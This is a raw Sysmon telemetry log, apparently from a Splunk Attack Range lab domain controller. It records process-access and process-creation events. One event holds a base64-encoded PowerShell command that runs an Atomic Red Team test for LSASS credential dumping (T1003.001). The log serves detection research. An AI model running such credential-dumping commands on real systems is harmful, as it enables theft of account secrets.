15:53:05.553{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005930Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005929Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005928Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005927Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005926Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7CE0-5FA1-3501-000000008801}34041348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF8DC7A8890) 154100x80000000000000005925Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.557{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000005924Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-3F01-000000008801}2956C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005923Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005922Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005921Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005920Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005919Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005918Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005917Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005916Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005915Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-3F01-000000008801}2956C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005914Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005913Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7CE1-5FA1-3E01-000000008801}27364364C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CE1-5FA1-3F01-000000008801}2956C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005912Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.423{D28789B6-7CE1-5FA1-3F01-000000008801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CE1-5FA1-3E01-000000008801}2736C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000005911Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-3E01-000000008801}2736C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005910Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005909Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005908Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005907Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005906Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 